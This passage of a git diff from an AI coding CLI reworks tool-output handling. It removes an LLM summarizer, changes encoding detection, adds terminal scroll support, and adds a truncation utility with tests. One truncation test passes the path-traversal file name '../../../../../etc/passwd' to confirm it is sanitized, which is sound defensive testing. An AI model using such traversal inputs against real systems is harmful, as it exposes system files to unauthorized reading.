false, - undefined, - false, - undefined, - undefined, - undefined, - ); - - mockGeminiClient = new GeminiClient(mockConfigInstance); - (mockGeminiClient.generateContent as Mock) = vi.fn(); - }); - - afterEach(() => { - vi.clearAllMocks(); - }); - - describe('summarizeToolOutput', () => { - it('should return original text if it is shorter than maxLength', async () => { - const shortText = 'This is a short text.'; - const result = await summarizeToolOutput( - shortText, - mockGeminiClient, - abortSignal, - 2000, - ); - expect(result).toBe(shortText); - expect(mockGeminiClient.generateContent).not.toHaveBeenCalled(); - }); - - it('should return original text if it is empty', async () => { - const emptyText = ''; - const result = await summarizeToolOutput( - emptyText, - mockGeminiClient, - abortSignal, - 2000, - ); - expect(result).toBe(emptyText); - expect(mockGeminiClient.generateContent).not.toHaveBeenCalled(); - }); - - it('should call generateContent if text is longer than maxLength', async () => { - const longText = 'This is a very long text.'.repeat(200); - const summary = 'This is a summary.'; - (mockGeminiClient.generateContent as Mock).mockResolvedValue({ - candidates: [{ content: { parts: [{ text: summary }] } }], - }); - - const result = await summarizeToolOutput( - longText, - mockGeminiClient, - abortSignal, - 2000, - ); - - expect(mockGeminiClient.generateContent).toHaveBeenCalledTimes(1); - expect(result).toBe(summary); - }); - - it('should return original text if generateContent throws an error', async () => { - const longText = 'This is a very long text.'.repeat(200); - const error = new Error('API Error'); - (mockGeminiClient.generateContent as Mock).mockRejectedValue(error); - - const result = await summarizeToolOutput( - longText, - mockGeminiClient, - abortSignal, - 2000, - ); - - expect(mockGeminiClient.generateContent).toHaveBeenCalledTimes(1); - expect(result).toBe(longText); - }); - - it('should construct the correct prompt for summarization', async () => { - const longText = 'This is a very long text.'.repeat(200); - const summary = 'This is a summary.'; - (mockGeminiClient.generateContent as Mock).mockResolvedValue({ - candidates: [{ content: { parts: [{ text: summary }] } }], - }); - - await summarizeToolOutput(longText, mockGeminiClient, abortSignal, 1000); - - const expectedPrompt = `Summarize the following tool output to be a maximum of 1000 tokens. The summary should be concise and capture the main points of the tool output. - -The summarization should be done based on the content that is provided. Here are the basic rules to follow: -1. If the text is a directory listing or any output that is structural, use the history of the conversation to understand the context. Using this context try to understand what information we need from the tool output and return that as a response. -2. If the text is text content and there is nothing structural that we need, summarize the text. -3. If the text is the output of a shell command, use the history of the conversation to understand the context. Using this context try to understand what information we need from the tool output and return a summarization along with the stack trace of any error within the tags. The stack trace should be complete and not truncated. If there are warnings, you should include them in the summary within tags. - - -Text to summarize: -"${longText}" - -Return the summary string which should first contain an overall summarization of text followed by the full stack trace of errors and warnings in the tool output. -`; - const calledWith = (mockGeminiClient.generateContent as Mock).mock - .calls[0]; - const contents = calledWith[0]; - expect(contents[0].parts[0].text).toBe(expectedPrompt); - }); - }); - - describe('llmSummarizer', () => { - it('should summarize tool output using summarizeToolOutput', async () => { - const toolResult: ToolResult = { - llmContent: 'This is a very long text.'.repeat(200), - returnDisplay: '', - }; - const summary = 'This is a summary.'; - (mockGeminiClient.generateContent as Mock).mockResolvedValue({ - candidates: [{ content: { parts: [{ text: summary }] } }], - }); - - const result = await llmSummarizer( - toolResult, - mockGeminiClient, - abortSignal, - ); - - expect(mockGeminiClient.generateContent).toHaveBeenCalledTimes(1); - expect(result).toBe(summary); - }); - - it('should handle different llmContent types', async () => { - const longText = 'This is a very long text.'.repeat(200); - const toolResult: ToolResult = { - llmContent: [{ text: longText }], - returnDisplay: '', - }; - const summary = 'This is a summary.'; - (mockGeminiClient.generateContent as Mock).mockResolvedValue({ - candidates: [{ content: { parts: [{ text: summary }] } }], - }); - - const result = await llmSummarizer( - toolResult, - mockGeminiClient, - abortSignal, - ); - - expect(mockGeminiClient.generateContent).toHaveBeenCalledTimes(1); - const calledWith = (mockGeminiClient.generateContent as Mock).mock - .calls[0]; - const contents = calledWith[0]; - expect(contents[0].parts[0].text).toContain(`"${longText}"`); - expect(result).toBe(summary); - }); - }); - - describe('defaultSummarizer', () => { - it('should stringify the llmContent', async () => { - const toolResult: ToolResult = { - llmContent: { text: 'some data' }, - returnDisplay: '', - }; - - const result = await defaultSummarizer( - toolResult, - mockGeminiClient, - abortSignal, - ); - - expect(result).toBe(JSON.stringify({ text: 'some data' })); - expect(mockGeminiClient.generateContent).not.toHaveBeenCalled(); - }); - }); -}); diff --git a/packages/core/src/utils/summarizer.ts b/packages/core/src/utils/summarizer.ts deleted file mode 100644 index 8c2b391ea..000000000 --- a/packages/core/src/utils/summarizer.ts +++ /dev/null @@ -1,99 +0,0 @@ -/** - * @license - * Copyright 2025 Google LLC - * SPDX-License-Identifier: Apache-2.0 - */ - -import type { ToolResult } from '../tools/tools.js'; -import type { - Content, - GenerateContentConfig, - GenerateContentResponse, -} from '@google/genai'; -import type { GeminiClient } from '../core/client.js'; -import { DEFAULT_QWEN_FLASH_MODEL } from '../config/models.js'; -import { getResponseText, partToString } from './partUtils.js'; -import { createDebugLogger } from './debugLogger.js'; - -const debugLogger = createDebugLogger('SUMMARIZER'); - -/** - * A function that summarizes the result of a tool execution. - * - * @param result The result of the tool execution. - * @returns The summary of the result. - */ -export type Summarizer = ( - result: ToolResult, - geminiClient: GeminiClient, - abortSignal: AbortSignal, -) => Promise; - -/** - * The default summarizer for tool results. - * - * @param result The result of the tool execution. - * @param geminiClient The Gemini client to use for summarization. - * @param abortSignal The abort signal to use for summarization. - * @returns The summary of the result. - */ -export const defaultSummarizer: Summarizer = ( - result: ToolResult, - _geminiClient: GeminiClient, - _abortSignal: AbortSignal, -) => Promise.resolve(JSON.stringify(result.llmContent)); - -const SUMMARIZE_TOOL_OUTPUT_PROMPT = `Summarize the following tool output to be a maximum of {maxOutputTokens} tokens. The summary should be concise and capture the main points of the tool output. - -The summarization should be done based on the content that is provided. Here are the basic rules to follow: -1. If the text is a directory listing or any output that is structural, use the history of the conversation to understand the context. Using this context try to understand what information we need from the tool output and return that as a response. -2. If the text is text content and there is nothing structural that we need, summarize the text. -3. If the text is the output of a shell command, use the history of the conversation to understand the context. Using this context try to understand what information we need from the tool output and return a summarization along with the stack trace of any error within the tags. The stack trace should be complete and not truncated. If there are warnings, you should include them in the summary within tags. - - -Text to summarize: -"{textToSummarize}" - -Return the summary string which should first contain an overall summarization of text followed by the full stack trace of errors and warnings in the tool output. -`; - -export const llmSummarizer: Summarizer = (result, geminiClient, abortSignal) => - summarizeToolOutput( - partToString(result.llmContent), - geminiClient, - abortSignal, - ); - -export async function summarizeToolOutput( - textToSummarize: string, - geminiClient: GeminiClient, - abortSignal: AbortSignal, - maxOutputTokens: number = 2000, -): Promise { - // There is going to be a slight difference here since we are comparing length of string with maxOutputTokens. - // This is meant to be a ballpark estimation of if we need to summarize the tool output. - if (!textToSummarize || textToSummarize.length < maxOutputTokens) { - return textToSummarize; - } - const prompt = SUMMARIZE_TOOL_OUTPUT_PROMPT.replace( - '{maxOutputTokens}', - String(maxOutputTokens), - ).replace('{textToSummarize}', textToSummarize); - - const contents: Content[] = [{ role: 'user', parts: [{ text: prompt }] }]; - const toolOutputSummarizerConfig: GenerateContentConfig = { - maxOutputTokens, - }; - try { - const parsedResponse = (await geminiClient.generateContent( - contents, - toolOutputSummarizerConfig, - abortSignal, - DEFAULT_QWEN_FLASH_MODEL, - )) as unknown as GenerateContentResponse; - return getResponseText(parsedResponse) || textToSummarize; - } catch (error) { - debugLogger.error('Failed to summarize tool output.', error); - return textToSummarize; - } -} diff --git a/packages/core/src/utils/systemEncoding.test.ts b/packages/core/src/utils/systemEncoding.test.ts index 6b6ce693f..9a8bb8887 100644 --- a/packages/core/src/utils/systemEncoding.test.ts +++ b/packages/core/src/utils/systemEncoding.test.ts @@ -54,7 +54,7 @@ describe('Shell Command Processor - Encoding Functions', () => { expect(windowsCodePageToEncoding(65001)).toBe('utf-8'); expect(windowsCodePageToEncoding(1252)).toBe('windows-1252'); expect(windowsCodePageToEncoding(932)).toBe('shift_jis'); - expect(windowsCodePageToEncoding(936)).toBe('gb2312'); + expect(windowsCodePageToEncoding(936)).toBe('gbk'); expect(windowsCodePageToEncoding(949)).toBe('euc-kr'); expect(windowsCodePageToEncoding(950)).toBe('big5'); expect(windowsCodePageToEncoding(1200)).toBe('utf-16le'); @@ -283,6 +283,23 @@ describe('Shell Command Processor - Encoding Functions', () => { mockedOsPlatform.mockReturnValue('linux'); }); + it('should return utf-8 for valid UTF-8 buffers regardless of system encoding', () => { + // System encoding is GBK, but buffer is valid UTF-8 + mockedOsPlatform.mockReturnValue('win32'); + mockedExecSync.mockReturnValue('Active code page: 936'); + + const buffer = Buffer.from('Hello 你好', 'utf-8'); + const result = getCachedEncodingForBuffer(buffer); + expect(result).toBe('utf-8'); + }); + + it('should return utf-8 for pure ASCII buffers', () => { + // ASCII is valid UTF-8 — should return utf-8 immediately + const buffer = Buffer.from('hello world'); + const result = getCachedEncodingForBuffer(buffer); + expect(result).toBe('utf-8'); + }); + it('should use cached system encoding on subsequent calls', () => { process.env['LANG'] = 'en_US.UTF-8'; const buffer = Buffer.from('test'); @@ -305,7 +322,8 @@ describe('Shell Command Processor - Encoding Functions', () => { throw new Error('locale command failed'); }); - const buffer = Buffer.from('test'); + // Use bytes that are NOT valid UTF-8 so the UTF-8-first check fails + const buffer = Buffer.from([0x80, 0x81, 0x82]); mockedChardetDetect.mockReturnValue('ISO-8859-1'); const result = getCachedEncodingForBuffer(buffer); @@ -335,8 +353,9 @@ describe('Shell Command Processor - Encoding Functions', () => { throw new Error('locale command failed'); }); - const buffer1 = Buffer.from('test1'); - const buffer2 = Buffer.from('test2'); + // Use bytes that are NOT valid UTF-8 so the UTF-8-first check fails + const buffer1 = Buffer.from([0x80, 0x81]); + const buffer2 = Buffer.from([0x82, 0x83]); mockedChardetDetect .mockReturnValueOnce('ISO-8859-1') @@ -354,7 +373,9 @@ describe('Shell Command Processor - Encoding Functions', () => { mockedOsPlatform.mockReturnValue('win32'); mockedExecSync.mockReturnValue('Active code page: 1252'); - const buffer = Buffer.from('test'); + // Use bytes that are NOT valid UTF-8 so the UTF-8-first check fails + // and we fall through to system encoding detection + const buffer = Buffer.from([0x80, 0x81, 0x82]); const result = getCachedEncodingForBuffer(buffer); expect(result).toBe('windows-1252'); @@ -365,7 +386,6 @@ describe('Shell Command Processor - Encoding Functions', () => { mockedExecSync.mockReturnValue('Active code page: 936'); // GBK const buffer = Buffer.from('test'); - // Mock chardet to return UTF-8 mockedChardetDetect.mockReturnValue('UTF-8'); const result = getCachedEncodingForBuffer(buffer); @@ -385,8 +405,9 @@ describe('Shell Command Processor - Encoding Functions', () => { throw new Error('locale command failed'); }); - const buffer1 = Buffer.from('test1'); - const buffer2 = Buffer.from('test2'); + // Use bytes that are NOT valid UTF-8 so the UTF-8-first check fails + const buffer1 = Buffer.from([0x80, 0x81]); + const buffer2 = Buffer.from([0x82, 0x83]); mockedChardetDetect .mockReturnValueOnce('ISO-8859-1') @@ -398,18 +419,16 @@ describe('Shell Command Processor - Encoding Functions', () => { const result1 = getCachedEncodingForBuffer(buffer1); const result2 = getCachedEncodingForBuffer(buffer2); - // Should call execSync only once due to caching (null result is cached) - expect(mockedExecSync).toHaveBeenCalledTimes(1); + // System encoding is only checked as fallback after UTF-8 and chardet + // both fail. Since chardet returns results here, execSync may not be called. expect(result1).toBe('iso-8859-1'); expect(result2).toBe('utf-16'); - // Call a third time to verify cache is still used - const buffer3 = Buffer.from('test3'); + // Call a third time to verify chardet is called each time (not cached) + const buffer3 = Buffer.from([0x84, 0x85]); mockedChardetDetect.mockReturnValueOnce('UTF-32'); const result3 = getCachedEncodingForBuffer(buffer3); - // Still should be only one call to execSync - expect(mockedExecSync).toHaveBeenCalledTimes(1); expect(result3).toBe('utf-32'); }); }); diff --git a/packages/core/src/utils/systemEncoding.ts b/packages/core/src/utils/systemEncoding.ts index 4bce69f4c..1af4831f1 100644 --- a/packages/core/src/utils/systemEncoding.ts +++ b/packages/core/src/utils/systemEncoding.ts @@ -4,6 +4,7 @@ * SPDX-License-Identifier: Apache-2.0 */ +import { isUtf8 } from 'node:buffer'; import { execSync } from 'node:child_process'; import os from 'node:os'; import { detect as chardetDetect } from 'chardet'; @@ -23,34 +24,39 @@ export function resetEncodingCache(): void { } /** - * Returns the system encoding, caching the result to avoid repeated system calls. - * If system encoding detection fails, falls back to detecting from the provided buffer. - * Note: Only the system encoding is cached - buffer-based detection runs for each buffer - * since different buffers may have different encodings. - * @param buffer A buffer to use for detecting encoding if system detection fails. + * Detects the encoding of a buffer. + * + * Strategy: try UTF-8 first, then chardet, then system encoding. + * UTF-8 is tried first because modern developer tools, PowerShell Core, + * git, node, and most CLI tools output UTF-8. Legacy codepage bytes + * (0x80-0xFF) rarely form valid multi-byte UTF-8 sequences by accident. + * + * This function should be called on the **complete** output buffer + * (after the command finishes), not on individual streaming chunks, + * to avoid misdetection when early chunks are ASCII-only. + * + * @param buffer A buffer to analyze for encoding detection. */ export function getCachedEncodingForBuffer(buffer: Buffer): string { - // Cache system encoding detection since it's system-wide + if (isUtf8(buffer)) { + return 'utf-8'; + } + + // Buffer is not valid UTF-8 — try chardet, then system encoding + const detected = detectEncodingFromBuffer(buffer); + if (detected) { + return detected; + } + if (cachedSystemEncoding === undefined) { cachedSystemEncoding = getSystemEncoding(); } - - // If we have a cached system encoding, use it if (cachedSystemEncoding) { - // If the system encoding is not UTF-8 (e.g. Windows CP936), but the buffer - // is detected as UTF-8, prefer UTF-8. This handles tools like 'git' which - // often output UTF-8 regardless of the system code page. - if (cachedSystemEncoding !== 'utf-8') { - const detected = detectEncodingFromBuffer(buffer); - if (detected === 'utf-8') { - return 'utf-8'; - } - } return cachedSystemEncoding; } - // Otherwise, detect from this specific buffer (don't cache this result) - return detectEncodingFromBuffer(buffer) || 'utf-8'; + // Last resort + return 'utf-8'; } /** @@ -123,6 +129,7 @@ export function getSystemEncoding(): string | null { * @param cp The Windows code page number (e.g., 437, 850, etc.) * @returns The corresponding encoding name as a string, or null if no mapping exists. */ + export function windowsCodePageToEncoding(cp: number): string | null { // Most common mappings; extend as needed const map: { [key: number]: string } = { @@ -132,7 +139,7 @@ export function windowsCodePageToEncoding(cp: number): string | null { 866: 'cp866', 874: 'windows-874', 932: 'shift_jis', - 936: 'gb2312', + 936: 'gbk', 949: 'euc-kr', 950: 'big5', 1200: 'utf-16le', @@ -158,13 +165,18 @@ export function windowsCodePageToEncoding(cp: number): string | null { } /** - * Attempts to detect encoding from a buffer using chardet. - * This is useful when system encoding detection fails. - * Returns the detected encoding in lowercase, or null if detection fails. + * Attempts to detect the encoding of a non-UTF-8 buffer using chardet + * statistical analysis. Returns null when chardet cannot determine the + * encoding (e.g. the buffer is too small or ambiguous). + * + * Callers that need a guaranteed result should provide their own fallback + * (e.g. {@link getCachedEncodingForBuffer} falls back to the system codepage). + * * @param buffer The buffer to analyze for encoding. * @return The detected encoding as a lowercase string, or null if detection fails. */ export function detectEncodingFromBuffer(buffer: Buffer): string | null { + // Try chardet statistical detection first — works well for larger files try { const detected = chardetDetect(buffer); if (detected && typeof detected === 'string') { diff --git a/packages/core/src/utils/terminalSerializer.ts b/packages/core/src/utils/terminalSerializer.ts index 7bcd2a4ce..e12fe25aa 100644 --- a/packages/core/src/utils/terminalSerializer.ts +++ b/packages/core/src/utils/terminalSerializer.ts @@ -131,17 +131,26 @@ class Cell { } } -export function serializeTerminalToObject(terminal: Terminal): AnsiOutput { +export function serializeTerminalToObject( + terminal: Terminal, + scrollOffset: number = 0, +): AnsiOutput { const buffer = terminal.buffer.active; - const cursorX = buffer.cursorX; - const cursorY = buffer.cursorY; const defaultFg = ''; const defaultBg = ''; + // Clamp scrollOffset to valid range [0, viewportY] + const clampedOffset = Math.max(0, Math.min(scrollOffset, buffer.viewportY)); + const startRow = buffer.viewportY - clampedOffset; + + // Only show cursor when viewing the live viewport (no scroll) + const cursorX = clampedOffset === 0 ? buffer.cursorX : -1; + const cursorY = clampedOffset === 0 ? buffer.cursorY : -1; + const result: AnsiOutput = []; for (let y = 0; y < terminal.rows; y++) { - const line = buffer.getLine(buffer.viewportY + y); + const line = buffer.getLine(startRow + y); const currentLine: AnsiLine = []; if (!line) { result.push(currentLine); diff --git a/packages/core/src/utils/truncation.test.ts b/packages/core/src/utils/truncation.test.ts new file mode 100644 index 000000000..4fb4bb99e --- /dev/null +++ b/packages/core/src/utils/truncation.test.ts @@ -0,0 +1,310 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, vi, beforeEach } from 'vitest'; +import { truncateAndSaveToFile } from './truncation.js'; +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; + +vi.mock('node:fs/promises'); + +describe('truncateAndSaveToFile', () => { + const mockWriteFile = vi.mocked(fs.writeFile); + const THRESHOLD = 40_000; + const TRUNCATE_LINES = 1000; + + beforeEach(() => { + vi.clearAllMocks(); + }); + + it('should return content unchanged if below both threshold and line limit', async () => { + const content = 'Short content'; + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result).toEqual({ content }); + expect(mockWriteFile).not.toHaveBeenCalled(); + }); + + it('should truncate when line limit exceeded even if under character threshold', async () => { + // 2000 short lines, well under the 40,000 char threshold + const lines = Array(2000).fill('short'); + const content = lines.join('\n'); // ~12,000 chars, under THRESHOLD + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + expect(content.length).toBeLessThan(THRESHOLD); + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result.outputFile).toBe( + path.join(projectTempDir, `${fileName}.output`), + ); + + const head = Math.floor(TRUNCATE_LINES / 5); + const beginning = lines.slice(0, head); + const end = lines.slice(-(TRUNCATE_LINES - head)); + const expectedTruncated = + beginning.join('\n') + + '\n\n---\n... [CONTENT TRUNCATED] ...\n---\n\n' + + end.join('\n'); + + expect(result.content).toContain( + 'Tool output was too large and has been truncated', + ); + expect(result.content).toContain(expectedTruncated); + }); + + it('should reduce effective lines when line content would exceed character threshold', async () => { + // 2000 lines of 100 chars each = 200,000 chars, well over THRESHOLD (40,000) + // Even after truncating to TRUNCATE_LINES (1000), that's 100,000 chars — still over. + // The effective line count should be reduced to fit within the threshold. + const lines = Array(2000).fill('x'.repeat(100)); + const content = lines.join('\n'); + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result.outputFile).toBeDefined(); + expect(result.content).toContain('... [CONTENT TRUNCATED] ...'); + + // Extract just the truncated part (after the instructions) + const truncatedPart = result.content.split( + 'Truncated part of the output:\n', + )[1]; + // The truncated content (excluding the instructions header) should + // be roughly within the character threshold. + expect(truncatedPart.length).toBeLessThan(THRESHOLD * 1.5); + + // With 100 chars/line and 40,000 threshold, effective lines ≈ 400. + // Verify we have fewer lines than the default TRUNCATE_LINES. + const truncatedLines = truncatedPart.split('\n'); + expect(truncatedLines.length).toBeLessThan(TRUNCATE_LINES); + }); + + it('should truncate content by lines when line limit is the binding constraint', async () => { + // 2000 lines of 5 chars each = ~12,000 chars, well under THRESHOLD (40,000) + // so the line limit (1000) is the binding constraint, not the char threshold. + const lines = Array(2000).fill('hello'); + const content = lines.join('\n'); + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + expect(content.length).toBeLessThan(THRESHOLD); + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result.outputFile).toBe( + path.join(projectTempDir, `${fileName}.output`), + ); + expect(mockWriteFile).toHaveBeenCalledWith( + path.join(projectTempDir, `${fileName}.output`), + content, + ); + + // Effective lines = min(1000, 40000/5) = 1000 (line limit is binding) + const head = Math.floor(TRUNCATE_LINES / 5); + const beginning = lines.slice(0, head); + const end = lines.slice(-(TRUNCATE_LINES - head)); + const expectedTruncated = + beginning.join('\n') + + '\n\n---\n... [CONTENT TRUNCATED] ...\n---\n\n' + + end.join('\n'); + + expect(result.content).toContain( + 'Tool output was too large and has been truncated', + ); + expect(result.content).toContain('Truncated part of the output:'); + expect(result.content).toContain(expectedTruncated); + }); + + it('should truncate content with few but very long lines', async () => { + const content = 'a'.repeat(200_000); // A single very long line + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result.outputFile).toBe( + path.join(projectTempDir, `${fileName}.output`), + ); + // Full original content is saved to file (no wrapping) + expect(mockWriteFile).toHaveBeenCalledWith( + path.join(projectTempDir, `${fileName}.output`), + content, + ); + + expect(result.content).toContain( + 'Tool output was too large and has been truncated', + ); + expect(result.content).toContain('... [CONTENT TRUNCATED] ...'); + + // The truncated content should stay near the character threshold + const truncatedPart = result.content.split( + 'Truncated part of the output:\n', + )[1]; + expect(truncatedPart.length).toBeLessThan(THRESHOLD * 1.5); + }); + + it('should stay near char threshold even when line lengths vary widely', async () => { + // Mix of short and very long lines — the old average-based approach + // would undercount because long lines in the tail blow past the budget. + const lines: string[] = []; + for (let i = 0; i < 2000; i++) { + lines.push(i % 10 === 0 ? 'x'.repeat(5000) : 'short'); + } + const content = lines.join('\n'); + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result.content).toContain('... [CONTENT TRUNCATED] ...'); + + const truncatedPart = result.content.split( + 'Truncated part of the output:\n', + )[1]; + // Should stay within ~1.5x the threshold even with variable line lengths + expect(truncatedPart.length).toBeLessThan(THRESHOLD * 1.5); + }); + + it('should handle file write errors gracefully', async () => { + const content = 'a'.repeat(2_000_000); + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + mockWriteFile.mockRejectedValue(new Error('File write failed')); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result.outputFile).toBeUndefined(); + expect(result.content).toContain( + '[Note: Could not save full output to file]', + ); + expect(mockWriteFile).toHaveBeenCalled(); + }); + + it('should save to correct file path with file name', async () => { + const content = 'a'.repeat(200_000); + const fileName = 'unique-file-123'; + const projectTempDir = '/custom/temp/dir'; + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + const expectedPath = path.join(projectTempDir, `${fileName}.output`); + expect(result.outputFile).toBe(expectedPath); + expect(mockWriteFile).toHaveBeenCalledWith(expectedPath, content); + }); + + it('should include helpful instructions in truncated message', async () => { + const content = 'a'.repeat(2_000_000); + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result.content).toContain( + 'Tool output was too large and has been truncated', + ); + expect(result.content).toContain('The full output has been saved to:'); + expect(result.content).toContain( + 'To read the complete output, use the read_file tool with the absolute file path above', + ); + expect(result.content).toContain( + 'The truncated output below shows the beginning and end of the content', + ); + }); + + it('should sanitize fileName to prevent path traversal', async () => { + const content = 'a'.repeat(200_000); + const fileName = '../../../../../etc/passwd'; + const projectTempDir = '/tmp/safe_dir'; + + mockWriteFile.mockResolvedValue(undefined); + + await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + const expectedPath = path.join(projectTempDir, 'passwd.output'); + expect(mockWriteFile).toHaveBeenCalledWith(expectedPath, content); + }); +}); diff --git a/packages/core/src/utils/truncation.ts b/packages/core/src/utils/truncation.ts new file mode 100644 index 000000000..6672a1f83 --- /dev/null +++ b/packages/core/src/utils/truncation.ts @@ -0,0 +1,153 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import * as crypto from 'node:crypto'; +import { ReadFileTool } from '../tools/read-file.js'; +import type { Config } from '../config/config.js'; +import { logToolOutputTruncated } from '../telemetry/loggers.js'; +import { ToolOutputTruncatedEvent } from '../telemetry/types.js'; + +/** + * Truncates large tool output and saves the full content to a temp file. + * Used by the shell tool to prevent excessively large outputs from being + * sent to the LLM context. + * + * If content length is within the threshold, returns it unchanged. + * Otherwise, saves full content to a file and returns a truncated version + * with head/tail lines and a pointer to the saved file. + */ +export async function truncateAndSaveToFile( + content: string, + fileName: string, + projectTempDir: string, + threshold: number, + truncateLines: number, +): Promise<{ content: string; outputFile?: string }> { + const lines = content.split('\n'); + + // Check both constraints: character threshold and line limit. + if (content.length <= threshold && lines.length <= truncateLines) { + return { content }; + } + + // Build head and tail within both line and character budgets. + const effectiveLines = Math.min(truncateLines, lines.length); + const headCount = Math.max(Math.floor(effectiveLines / 5), 1); + const tailCount = effectiveLines - headCount; + const separator = '\n\n---\n... [CONTENT TRUNCATED] ...\n---\n\n'; + const ellipsis = '...'; + + // Collect head lines within budget. If a single line exceeds the + // remaining budget, include a truncated slice of it. + const headBudget = Math.floor(threshold / 5); + const beginning: string[] = []; + let headChars = 0; + for (let i = 0; i < Math.min(headCount, lines.length); i++) { + const remaining = headBudget - headChars; + if (remaining <= 0) break; + if (lines[i].length + 1 > remaining) { + const sliceLen = Math.max(remaining - ellipsis.length, 0); + beginning.push(lines[i].slice(0, sliceLen) + ellipsis); + headChars = headBudget; + break; + } + beginning.push(lines[i]); + headChars += lines[i].length + 1; // +1 for newline + } + + // Collect tail lines within remaining budget. If a single line exceeds + // the remaining budget, include a truncated slice of it. + const tailBudget = Math.max(threshold - headChars - separator.length, 0); + const end: string[] = []; + let tailChars = 0; + const tailStart = Math.max(lines.length - tailCount, beginning.length); + for (let i = lines.length - 1; i >= tailStart; i--) { + const remaining = tailBudget - tailChars; + if (remaining <= 0) break; + if (lines[i].length + 1 > remaining) { + const sliceLen = Math.max(remaining - ellipsis.length, 0); + end.unshift(ellipsis + lines[i].slice(-sliceLen)); + tailChars = tailBudget; + break; + } + end.unshift(lines[i]); + tailChars += lines[i].length + 1; + } + + const truncatedContent = beginning.join('\n') + separator + end.join('\n'); + + // Sanitize fileName to prevent path traversal. + const safeFileName = `${path.basename(fileName)}.output`; + const outputFile = path.join(projectTempDir, safeFileName); + try { + await fs.writeFile(outputFile, content); + + return { + content: `Tool output was too large and has been truncated. +The full output has been saved to: ${outputFile} +To read the complete output, use the ${ReadFileTool.Name} tool with the absolute file path above. +The truncated output below shows the beginning and end of the content. The marker '... [CONTENT TRUNCATED] ...' indicates where content was removed. + +Truncated part of the output: +${truncatedContent}`, + outputFile, + }; + } catch (_error) { + return { + content: + truncatedContent + `\n[Note: Could not save full output to file]`, + }; + } +} + +/** + * High-level truncation helper that reads thresholds from Config, + * truncates if needed, saves full output to a temp file, and logs + * telemetry. Returns the (possibly truncated) content and an optional + * output file path. + * + * Callers no longer need to duplicate config extraction, file naming, + * or telemetry logging. + */ +export async function truncateToolOutput( + config: Config, + toolName: string, + content: string, +): Promise<{ content: string; outputFile?: string }> { + const threshold = config.getTruncateToolOutputThreshold(); + const lines = config.getTruncateToolOutputLines(); + + if (threshold <= 0 || lines <= 0) { + return { content }; + } + + const originalLength = content.length; + const fileName = `${toolName}_${crypto.randomBytes(6).toString('hex')}`; + const result = await truncateAndSaveToFile( + content, + fileName, + config.storage.getProjectTempDir(), + threshold, + lines, + ); + + if (result.outputFile) { + logToolOutputTruncated( + config, + new ToolOutputTruncatedEvent('', { + toolName, + originalContentLength: originalLength, + truncatedContentLength: result.content.length, + threshold, + lines, + }), + ); + } + + return result; +} diff --git a/packages/core/src/utils/workspaceContext.test.ts b/packages/core/src/utils/workspaceContext.test.ts index 686c50ba3..cf4cca2ea 100644 --- a/packages/core/src/utils/workspaceContext.test.ts +++ b/packages/core/src/utils/workspaceContext.test.ts @@ -412,3 +412,126 @@ describe('WorkspaceContext with optional directories', () => { expect(directories).toEqual([cwd, existingDir1]); }); }); + +describe('WorkspaceContext removeDirectory', () => { + let tempDir: string; + let cwd: string; + let addedDir: string; + let anotherDir: string; + + beforeEach(() => { + tempDir = fs.realpathSync( + fs.mkdtempSync(path.join(os.tmpdir(), 'workspace-context-remove-')), + ); + cwd = path.join(tempDir, 'project'); + addedDir = path.join(tempDir, 'added'); + anotherDir = path.join(tempDir, 'another'); + + fs.mkdirSync(cwd, { recursive: true }); + fs.mkdirSync(addedDir, { recursive: true }); + fs.mkdirSync(anotherDir, { recursive: true }); + }); + + afterEach(() => { + fs.rmSync(tempDir, { recursive: true, force: true }); + }); + + it('should remove a runtime-added directory', () => { + const ctx = new WorkspaceContext(cwd); + ctx.addDirectory(addedDir); + expect(ctx.getDirectories()).toContain(addedDir); + + const result = ctx.removeDirectory(addedDir); + expect(result).toBe(true); + expect(ctx.getDirectories()).not.toContain(addedDir); + }); + + it('should not remove the initial cwd directory', () => { + const ctx = new WorkspaceContext(cwd, [addedDir]); + // Only cwd is truly initial (non-removable) + const result = ctx.removeDirectory(cwd); + expect(result).toBe(false); + expect(ctx.getDirectories()).toContain(cwd); + }); + + it('should allow removing an additional directory passed at construction', () => { + const ctx = new WorkspaceContext(cwd, [addedDir]); + // additionalDirectories are NOT initial — they can be removed + const result = ctx.removeDirectory(addedDir); + expect(result).toBe(true); + 